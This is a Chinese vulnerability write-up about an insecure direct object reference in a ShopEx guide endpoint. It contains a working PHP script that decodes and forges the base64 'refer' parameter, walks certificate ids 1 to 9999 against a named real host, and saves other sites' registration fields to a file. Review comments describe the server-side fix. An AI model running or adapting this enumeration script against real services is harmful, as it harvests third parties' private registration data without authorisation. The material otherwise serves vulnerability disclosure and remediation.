refer 参数经 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站。base64 只是编码而不是加密，从下面的脚本看，服务端对 certi_id 是否属于请求方似乎没有做任何校验，因此顺序递增该值就能取到其他站点的登记信息。
<?php

/**
 * Proof-of-concept from the write-up: requests the ShopEx guide page for one
 * certificate id and records the text-input fields the page returns.
 *
 * The "refer" query parameter is JSON that is only base64-encoded. The script
 * shows that the caller chooses certi_id freely; nothing in the request proves
 * that the id belongs to the requester.
 *
 * NOTE(review): the weakness is on the server side. Swapping base64 for another
 * reversible transform would not close it. The endpoint needs to bind certi_id
 * to an authenticated requester (or verify a server-side signature over the
 * parameter) and throttle sequential lookups.
 *
 * @param mixed $cid Certificate id; coerced with intval() before use.
 */
function ShowshopExD($cid) {
    $endpoint = 'http://guide.ecos.shopex.cn/step2.php';
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');

    $ch = curl_init($endpoint.'?refer='.$refer);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);

    $body = curl_exec($ch);
    $body = mb_convert_encoding($body, "gb2312", "UTF-8");

    // The page echoes the refer value back when the id resolves to a record.
    // NOTE(review): this is a truthiness test, so a match at offset 0 or a
    // failed request both count as "no record".
    if (strpos($body, $refer)) {
        $out = fopen("c:/shopEx.txt", 'ab'); // append results to a local file

        // Collect the attribute text of every <input type="text" ... /> tag.
        preg_match_all('/<input\stype="text"(.*?)\/>/', $body, $inputs);

        foreach ($inputs[1] as $attrs) {
            // Group 1 is the field name, group 3 the field value.
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $pair);

            echo $pair[1][0].':'.$pair[3][0]."\r\n";
            $line = $pair[1][0].':'.$pair[3][0]."\r\n";
            fwrite($out, $line, strlen($line));
        }

        echo '--------------------------------'."\r\n";
        fclose($out);
    }

    flush();
    curl_close($ch);
}

// Walk certificate ids 1..9999 (the enumeration described in the write-up).
foreach (range(1, 9999) as $certiId) {
    ShowshopExD($certiId);
}
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式